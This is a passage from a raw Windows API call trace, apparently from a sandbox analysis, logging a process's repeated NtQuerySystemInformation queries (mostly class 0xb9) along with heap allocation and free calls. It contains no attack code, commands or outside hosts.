(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x28, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x28, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0186.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x50, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x28, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0186.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x38, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.345] GetProcessHeap () returned 0x27fc8db0000 [0186.345] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8e069b0 [0186.345] GetProcessHeap () returned 0x27fc8db0000 [0186.345] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8e2a230 [0186.345] GetProcessHeap () returned 0x27fc8db0000 [0186.346] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x124) returned 0x27fc8dba4b0 [0186.347] GetProcessHeap () returned 0x27fc8db0000 [0186.347] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x130) returned 0x27fc8e57130 [0186.347] GetProcessHeap () returned 0x27fc8db0000 [0186.347] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc98a67a0 [0186.348] GetProcessHeap () returned 0x27fc8db0000 [0186.348] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x138) returned 0x27fc98d9f30 [0186.348] GetProcessHeap () returned 0x27fc8db0000 [0186.348] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8e07560 [0186.348] GetProcessHeap () returned 0x27fc8db0000 [0186.348] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8e2a330 [0186.348] GetProcessHeap () returned 0x27fc8db0000 [0186.348] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8eab480 | out: hHeap=0x27fc8db0000) returned 1 [0186.348] GetProcessHeap () returned 0x27fc8db0000 [0186.348] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1ec) returned 0x27fc8eab480 [0186.349] GetProcessHeap () returned 0x27fc8db0000 [0186.349] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1000f4) returned 0x27fc9a65040 [0186.353] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67fdf18 | out: phModule=0xf7a67fdf18*=0x7ffcea380000) returned 1 [0186.353] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0186.353] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xf7a67fe040, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xf7a67fe040, ResultLength=0x0) returned 0x0 [0186.478] GetProcessHeap () returned 0x27fc8db0000 [0186.478] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc98a6920 [0186.478] GetProcessHeap () returned 0x27fc8db0000 [0186.478] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x2d30) returned 0x27fc8e5bef0 [0186.479] GetProcessHeap () returned 0x27fc8db0000 [0186.479] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8e07350 [0186.479] GetProcessHeap () returned 0x27fc8db0000 [0186.479] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8e2a1c0 [0186.480] GetProcessHeap () returned 0x27fc8db0000 [0186.481] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x2d1c) returned 0x27fc8e61960 [0186.481] GetProcessHeap () returned 0x27fc8db0000 [0186.481] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e57130 | out: hHeap=0x27fc8db0000) returned 1 [0186.481] GetProcessHeap () returned 0x27fc8db0000 [0186.481] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc98d9f30 | out: hHeap=0x27fc8db0000) returned 1 [0186.481] GetProcessHeap () returned 0x27fc8db0000 [0186.481] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e07560 | out: hHeap=0x27fc8db0000) returned 1 [0186.481] GetProcessHeap () returned 0x27fc8db0000 [0186.482] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e2a330 | out: hHeap=0x27fc8db0000) returned 1 [0186.482] GetProcessHeap () returned 0x27fc8db0000 [0186.482] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc98a67a0 | out: hHeap=0x27fc8db0000) returned 1 [0186.482] GetProcessHeap () returned 0x27fc8db0000 [0186.482] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8eab480 | out: hHeap=0x27fc8db0000) returned 1 [0186.482] GetProcessHeap () returned 0x27fc8db0000 [0186.482] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9a65040 | out: hHeap=0x27fc8db0000) returned 1 [0186.485] GetProcessHeap () returned 0x27fc8db0000 [0186.486] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e5bef0 | out: hHeap=0x27fc8db0000) returned 1 [0186.486] GetProcessHeap () returned 0x27fc8db0000 [0186.486] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e07350 | out: hHeap=0x27fc8db0000) returned 1 [0186.486] GetProcessHeap () returned 0x27fc8db0000 [0186.486] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e2a1c0 | out: hHeap=0x27fc8db0000) returned 1 [0186.486] GetProcessHeap () returned 0x27fc8db0000 [0186.486] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc98a6920 | out: hHeap=0x27fc8db0000) returned 1 [0186.486] GetProcessHeap () returned 0x27fc8db0000 [0186.486] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e5ec30 | out: hHeap=0x27fc8db0000) returned 1 [0186.581] GetProcessHeap () returned 0x27fc8db0000 [0186.581] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dba4b0 | out: hHeap=0x27fc8db0000) returned 1 [0186.581] GetProcessHeap () returned 0x27fc8db0000 [0186.581] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e61960 | out: hHeap=0x27fc8db0000) returned 1 [0186.581] GetProcessHeap () returned 0x27fc8db0000 [0186.581] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e069b0 | out: hHeap=0x27fc8db0000) returned 1 [0186.581] GetProcessHeap () returned 0x27fc8db0000 [0186.581] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e2a230 | out: hHeap=0x27fc8db0000) returned 1 [0186.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0186.681] LocalAlloc (uFlags=0x0, uBytes=0x118) returned 0x27fc8e57130 [0186.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0186.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe070, Length=0x30, ResultLength=0x0) [0186.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x30, ResultLength=0x0) [0186.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x30, ResultLength=0x0) [0186.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0186.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0186.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0186.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0186.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0186.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0186.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.091] GetProcessHeap () returned 0x27fc8db0000 [0187.091] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2c) returned 0x27fc98a6920 [0187.091] NtQuerySystemInformation 